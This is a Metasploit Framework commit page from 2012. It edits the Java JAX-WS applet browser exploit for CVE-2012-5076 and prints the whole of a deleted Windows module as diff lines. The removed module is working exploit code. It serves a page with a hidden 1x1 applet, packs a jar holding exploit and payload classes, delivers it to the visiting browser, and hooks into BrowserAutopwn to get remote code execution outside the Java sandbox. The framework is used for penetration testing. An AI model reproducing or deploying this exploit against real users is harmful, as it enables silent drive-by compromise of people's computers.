Skip to content
This repository
Browse code

thins in place...

  • Loading branch information...
commit 8e7a74880595e1af878dd6778103f0aad87dcaee 1 parent 5076198
authored November 11, 2012
3  modules/exploits/multi/browser/java_jre17_jaxws.rb
@@ -108,9 +108,10 @@ def on_request_uri( cli, request )
108 108
 	end
109 109
 
110 110
 	def generate_html
  111
+		jar_name = rand_text_alpha(rand(6)+3) + ".jar"
111 112
 		html  = "<html><head></head>"
112 113
 		html += "<body>"
113  
-		html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
  114
+		html += "<applet archive=\"#{jar_name}\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
114 115
 		html += "</applet></body></html>"
115 116
 		return html
116 117
 	end
119  modules/exploits/windows/browser/java_jre17_jaxws.rb
... ...
@@ -1,119 +0,0 @@
1  
-##
2  
-# This file is part of the Metasploit Framework and may be subject to
3  
-# redistribution and commercial restrictions. Please see the Metasploit
4  
-# web site for more information on licensing and terms of use.
5  
-#   http://metasploit.com/
6  
-##
7  
-
8  
-require 'msf/core'
9  
-require 'rex'
10  
-
11  
-class Metasploit3 < Msf::Exploit::Remote
12  
-	Rank = ExcellentRanking
13  
-
14  
-	include Msf::Exploit::Remote::HttpServer::HTML
15  
-
16  
-	include Msf::Exploit::Remote::BrowserAutopwn
17  
-	autopwn_info({ :javascript => false })
18  
-
19  
-	def initialize( info = {} )
20  
-		super( update_info( info,
21  
-			'Name'          => 'Java Applet JAX-WS Remote Code Execution',
22  
-			'Description'   => %q{
23  
-					This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java
24  
-				code outside of the sandbox as exploited in the wild in November of 2012. The
25  
-				vulnerability affects Java version 7u7 and earlier.
26  
-			},
27  
-			'License'       => MSF_LICENSE,
28  
-			'Author'        =>
29  
-				[
30  
-					'Unknown', # Vulnerability Discovery
31  
-					'juan vazquez' # metasploit module
32  
-				],
33  
-			'References'    =>
34  
-				[
35  
-					[ 'CVE', '2012-5076' ],
36  
-					[ 'OSVDB', '86363' ],
37  
-					[ 'BID', '56054' ],
38  
-					[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html' ],
39  
-					[ 'URL', 'http://malware.dontneedcoffee.com/2012/11/cool-ek-hello-my-friend-cve-2012-5067.html' ]
40  
-				],
41  
-			'Platform'      => [ 'java', 'win' ],
42  
-			'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
43  
-			'Targets'       =>
44  
-				[
45  
-					[ 'Generic (Java Payload)',
46  
-						{
47  
-							'Arch' => ARCH_JAVA,
48  
-						}
49  
-					],
50  
-					[ 'Windows Universal',
51  
-						{
52  
-							'Arch' => ARCH_X86,
53  
-							'Platform' => 'win'
54  
-						}
55  
-					],
56  
-					[ 'Linux x86',
57  
-						{
58  
-							'Arch' => ARCH_X86,
59  
-							'Platform' => 'linux'
60  
-						}
61  
-					]
62  
-				],
63  
-			'DefaultTarget'  => 0,
64  
-			'DisclosureDate' => 'Oct 16 2012'
65  
-			))
66  
-	end
67  
-
68  
-
69  
-	def on_request_uri( cli, request )
70  
-		if not request.uri.match(/\.jar$/i)
71  
-			if not request.uri.match(/\/$/)
72  
-				send_redirect(cli, get_resource() + '/', '')
73  
-				return
74  
-			end
75  
-
76  
-			print_status("#{self.name} handling request")
77  
-
78  
-			send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
79  
-			return
80  
-		end
81  
-
82  
-		paths = [
83  
-			[ "Exploit.class" ],
84  
-			[ "MyPayload.class" ]
85  
-		]
86  
-
87  
-		p = regenerate_payload(cli)
88  
-
89  
-		jar  = p.encoded_jar
90  
-
91  
-		paths.each do |path|
92  
-			1.upto(path.length - 1) do |idx|
93  
-				full = path[0,idx].join("/") + "/"
94  
-				if !(jar.entries.map{|e|e.name}.include?(full))
95  
-					jar.add_file(full, '')
96  
-				end
97  
-			end
98  
-			fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2012-5076", path ), "rb")
99  
-			data = fd.read(fd.stat.size)
100  
-			jar.add_file(path.join("/"), data)
101  
-			fd.close
102  
-		end
103  
-
104  
-		print_status("Sending Applet.jar")
105  
-		send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )
106  
-
107  
-		handler( cli )
108  
-	end
109  
-
110  
-	def generate_html
111  
-		jar_name = rand_text_alpha(rand(6)+3) + ".jar"
112  
-		html  = "<html><head></head>"
113  
-		html += "<body>"
114  
-		html += "<applet archive=\"#{jar_name}\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
115  
-		html += "</applet></body></html>"
116  
-		return html
117  
-	end
118  
-
119  
-end

0 notes on commit 8e7a748

Please sign in to comment.
Something went wrong with that request. Please try again.